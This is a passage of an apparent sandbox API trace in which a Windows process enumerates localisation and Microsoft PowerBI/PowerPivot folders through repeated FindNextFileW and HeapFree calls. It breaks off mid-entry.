1 [0185.043] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.043] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1434d390, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1434d390, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="id", cAlternateFileName="")) returned 1 [0185.045] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.045] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf964b3dd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14969496, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14969496, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it", cAlternateFileName="")) returned 1 [0185.047] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.047] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf15d84bd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x146e0bdc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x146e0bdc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja", cAlternateFileName="")) returned 1 [0185.049] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.049] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14b330aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kk", cAlternateFileName="")) returned 1 [0185.051] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.051] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14ac0994, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0185.052] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.052] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0185.054] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.054] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf035e09d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1525a179, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0185.057] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.057] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerBI.Diagnostics.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0185.059] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.059] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x718b80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x15a3fea8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15a3fea8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0185.061] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.061] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf18f9628, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b71118, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b71118, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0185.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.063] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15b24c93, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15b24c93, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0185.065] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.065] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15bbd5ad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15bbd5ad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt", cAlternateFileName="")) returned 1 [0185.067] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.067] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf475131d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15be380c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15be380c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0185.227] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.228] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6ac83cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d3adab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d3adab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0185.230] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.230] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe00baf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15d14b21, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15d14b21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0185.231] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.232] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e92299, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e92299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0185.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.233] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1b359a5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15e45dad, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15e45dad, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0185.235] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.235] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a2a905, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15f04999, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15f04999, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-cyrl", cAlternateFileName="")) returned 1 [0185.238] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.238] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x160a83ba, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0185.240] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.240] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0185.242] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.242] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa8eba59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16035c5a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16035c5a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0185.244] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.244] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c66c57, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16166f59, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0185.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.247] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16140cde, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0185.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.249] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0185.251] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.251] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf637b042, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x161d962a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x161d962a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0185.252] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.253] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x163ef7bf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x163ef7bf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0185.255] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.255] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0185.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.257] FindNextFileW (in: hFindFile=0x43a2fd8, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x164159c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x164159c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0185.257] FindClose (in: hFindFile=0x43a2fd8 | out: hFindFile=0x43a2fd8) returned 1 [0185.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0185.257] FindNextFileW (in: hFindFile=0x43a2dd8, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd68243, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PowerPivot Excel Add-in", cAlternateFileName="POWERP~1")) returned 1 [0185.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.260] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x165b9401, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x165b9401, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0185.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.454] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6296213, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16605845, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16605845, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0185.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.457] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x164ae360, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0185.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.459] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0185.462] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.462] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf10a1263, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1662bb01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0185.464] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.464] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0185.467] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.467] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0185.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.470] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x167a9331, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0185.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.470] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0185.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.472] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1480f75, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x167a9331, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0185.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44850c8 | out: hHeap=0x680000) returned 1 [0185.475] FindNextFileW (in: hFindFile=0x43a2918, lpFindFileData=0x39dee10 | out: lpFindFileData=0x39dee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16783027, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16783027, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu", 